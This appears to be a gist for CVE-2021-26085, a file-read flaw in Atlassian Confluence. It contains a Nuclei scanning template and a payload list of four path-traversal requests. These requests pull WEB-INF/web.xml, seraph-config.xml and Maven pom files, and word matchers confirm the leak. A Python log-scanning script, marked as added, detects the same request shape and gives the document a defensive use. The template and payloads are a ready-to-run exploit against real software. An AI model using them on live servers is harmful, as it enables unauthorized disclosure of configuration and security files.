CVE-2021-26085

Ideas from: https://github.com/ColdFusionX/CVE-2021-26085

Modifications from: my burp

https://twitter.com/zeroc00I

DISCLAIMER: Domains in the list should end with "/"

confluence-CVE-2021-26085.yaml

id: confluence-lfi-fuzz

info:
  name: confluence-lfi-zeroc00I
  author: zeroc00I
  severity: high
  reference: lfi
  tags: lfi

requests:
  - payloads:
      path: confluence-lfi.txt
    # attack is a per-request field, so it sits here rather than at the top level
    attack: clusterbomb
    raw:
      - |
        GET /{{path}} HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "groupId>org.springframework"
        part: body
      - type: word
        words:
          - "Generated by Maven"
        part: body
      - type: word
        words:
          - "security-config"
        part: body
      - type: word
        words:
          - 'com.atlassian.confluence.setup'

confluence-lfi.txt

s/123cfx/_/;/WEB-INF/web.xml
s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
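
The four paths above share one shape: /s/<token>/_/;/ followed by WEB-INF or META-INF. As an added example (not part of the original gist), this Python sketch flags that shape in web access logs. It assumes common/combined log format, and the sample lines and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Path shape taken from the payload list above: /s/<token>/_/;/WEB-INF/... or /META-INF/...
TRAVERSAL = re.compile(r"^/s/(?:[^/]+/)+_/;/(WEB-INF|META-INF)/", re.IGNORECASE)
# Request field of a common/combined log line: "METHOD target PROTOCOL" status
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize(target):
    """Drop the query string and percent-decode twice (catches %3b and %253b)."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path


def find_hits(lines):
    """Return (client, status, path) for each request matching the payload shape."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        path = normalize(m.group("target"))
        if TRAVERSAL.match(path):
            client = line.split(" ", 1)[0]
            hits.append((client, int(m.group("status")), path))
    return hits


# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Oct/2021:10:00:01 +0000] "GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 9120',
    '203.0.113.7 - - [01/Oct/2021:10:00:02 +0000] "GET /s/abc/_/%3B/META-INF/maven/'
    'com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1" 404 512',
    '198.51.100.4 - - [01/Oct/2021:10:00:03 +0000] "GET /s/d41d8c/8703/_/images/logo.png HTTP/1.1" 200 3301',
    '198.51.100.4 - - [01/Oct/2021:10:00:04 +0000] "GET /dashboard.action HTTP/1.1" 200 20110',
]

if __name__ == "__main__":
    for client, status, path in find_hits(SAMPLE):
        # A 200 suggests the file was served; other codes indicate a probe only
        print(client, status, path, "SERVED" if status == 200 else "probed")
```

Hits answered with status 200 are the ones to triage first, since they suggest the instance returned the file and is still unpatched.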

Running Demo